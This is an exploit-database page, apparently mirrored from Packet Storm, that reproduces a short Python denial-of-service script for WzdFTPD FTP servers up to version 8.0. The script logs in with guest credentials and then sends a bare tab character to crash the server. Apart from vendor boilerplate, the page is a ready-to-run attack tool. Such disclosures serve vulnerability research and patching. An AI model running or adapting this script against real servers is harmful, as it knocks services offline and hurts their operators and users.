Lucene search
K

WzdFTPD Denial Of Service

🗓️ 24 Jul 2009 00:00:00Reported by Jose Miguel EsparzaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

WzdFTPD Denial Of Service <= 8.0 Exploi

Code
`#!/usr/bin/env python  
#  
# WzdFTPD Denial of Service (<= 8.0)  
#  
# wzdftpd_dos.py by Jose Miguel Esparza  
# 2007-01-19 S21sec labs  
  
import sys,socket  
  
user = "guest"  
passw = "guest"  
if len(sys.argv) != 3:   
sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")  
target = sys.argv[1]  
targetPort = int(sys.argv[2])  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((target,targetPort))  
s.recv(1024)  
s.sendall("USER " + user + "\r\n")  
s.recv(1024)  
s.sendall("PASS " + passw + "\r\n")  
s.recv(1024)  
s.sendall("\t")  
s.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Jul 2009 00:00Current
0.2Low risk
Vulners AI Score0.2
22